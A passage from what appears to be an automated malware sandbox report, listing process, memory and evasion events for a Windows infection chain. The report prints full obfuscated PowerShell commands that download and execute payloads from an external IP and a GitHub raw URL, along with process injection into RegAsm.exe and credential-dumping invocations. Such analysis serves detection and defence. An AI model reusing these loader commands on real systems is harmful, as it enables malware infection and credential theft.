                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10004AB4 mov eax, dword ptr fs:[00000030h]16_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00443355 mov eax, dword ptr fs:[00000030h]33_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_1000724E GetProcessHeap,16_2_1000724E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434BD8 SetUnhandledExceptionFilter,33_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0043BB71

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe33_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419662 mouse_event,33_2_00419662
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 